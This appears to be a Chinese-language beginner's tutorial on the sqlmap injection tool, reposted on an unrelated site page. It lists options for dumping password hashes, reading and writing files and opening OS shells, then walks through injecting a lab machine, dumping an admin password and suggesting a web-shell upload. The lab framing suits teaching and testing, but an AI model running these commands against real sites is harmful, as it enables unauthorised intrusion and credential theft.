sqlmap注入入门

当前位置:首页老子有钱游戏 >

老子有钱游戏

sqlmap注入入门

时间:2019-06-10本站浏览次数:450

       

sqlmap注入入门

sqlmap的用法:

​ linux中: sqlmap [选项]

​ Windows中: python sqlmap [选项]

常用的参数及含义:

目标

​ -d DIRECT 直接连接数据库

​ -u URL, --url=URL 目标 URL(例如:"http://www.site.com/vuln.php?id=1")

​ -l LOGFILE 从 Burp 或 WebScarab 代理的日志文件中解析目标地址

​ -x SITEMAPURL 从远程网站地图(.xml)文件中解析目标

​ -m BULKFILE 从文本文件中获取批量目标

​ -r REQUESTFILE 从文件中读取 HTTP 请求

​ -g GOOGLEDORK 使用 Google dork 结果作为目标

​ -c CONFIGFILE 从 INI 配置文件中加载选项

枚举:

​ 以下选项用于获取后端数据库管理系统的信息,结构和数据表中的数据。此外,还可以运行你输入的 SQL 语句

​ a, --all 获取所有信息、数据

​ -b, --banner 获取 DBMS banner

​ --current-user 获取 DBMS 当前用户

​ --current-db 获取 DBMS 当前数据库

​ --hostname 获取 DBMS 服务器的主机名

​ --is-dba 探测 DBMS 当前用户是否为 DBA(数据库管理员)

​ --users 枚举出 DBMS 所有用户

​ --passwords 枚举出 DBMS 所有用户的密码哈希

​ --sql-query=QUERY 指定要执行的 SQL 语句

​ --sql-shell 调出交互式 SQL shell

​ --sql-file=SQLFILE 执行文件中的 SQL 语句

暴力破解:

​ 以下选项用于暴力破解测试

​ --common-tables 检测常见的表名是否存在

​ --common-columns 检测常用的列名是否存在

访问文件系统:

​ 以下选项用于访问后端数据库管理系统的底层文件系统

​ --file-read=RFILE 读取后端 DBMS 文件系统中的文件

​ --file-write=WFILE 写入后端 DBMS 文件系统中的文件

​ --file-dest=DFILE 使用文件绝对路径写入到后端 DBMS

访问操作系统:

​ 以下选项用于访问后端数据库管理系统的底层操作系统

​ --os-cmd=OSCMD 执行操作系统命令

​ --os-shell 调出交互式操作系统 shell

​ --os-pwn 调出 OOB shell,Meterpreter 或 VNC

​ --os-smbrelay 一键调出 OOB shell,Meterpreter 或 VNC


靶机实战

root@kaliwifi:~# sqlmap -u http://192.168.214.133/search.php?id=11

可以得出目标主机是Ubuntu,web服务为apache,数据库管理系统是MySQL以及它们的版本信息。

    列举出DBMS中所有的数据库

    root@kaliwifi:~# sqlmap -u http://192.168.214.133/search.php?id=11 --dbs

    获取DBMS当前数据库

    root@kaliwifi:~# sqlmap -u http://192.168.214.133/search.php?id=11 --current-db

    列举出test数据库中的所有表名

    root@kaliwifi:~# sqlmap -u http://192.168.214.133/search.php?id=11 -D test --tables

我们发现了一个admin表,猜测其中可能有网站管路员的密码信息

    查询admin表中的所有信息

    root@kaliwifi:~# sqlmap -u http://192.168.214.133/search.php?id=11 --sql-query="select * from test.admin;"

我们获得了admin账户的密码,为mysql,我们可以利用admin用户,向目标服务器上传一句话木马,获取webshell。(可以自行百度“一句话木马”)

    调出交互式SQL shell

    root@kaliwifi:~# sqlmap -u http://192.168.214.133/search.php?id=11 --sql-shell

在sql-shell可以执行sql查询语句

select * from test.admin;

和第四步得到的结果是一样的

##### 小结

利用SQLmap可以进行简单的sql注入,方便快捷。利用sqlmap可以查看目标机器的os,DBMS等。还可以可以枚举数据库、表、列。以上结果只是为了演示sqlmap的基本用法,在实际操作中很可能注入失败,可以进一步的查看sqlmap wiki。




公司地址:青海省西宁市城东经济技术开发区经桥路66号
联系人:刘悦 18590343820
王香 15885909063
电话:18585081154 传真:qmity7t@162.com
邮箱:0vjksqq95@163.com

粤公网安备 44030702001579号

老子有钱网页@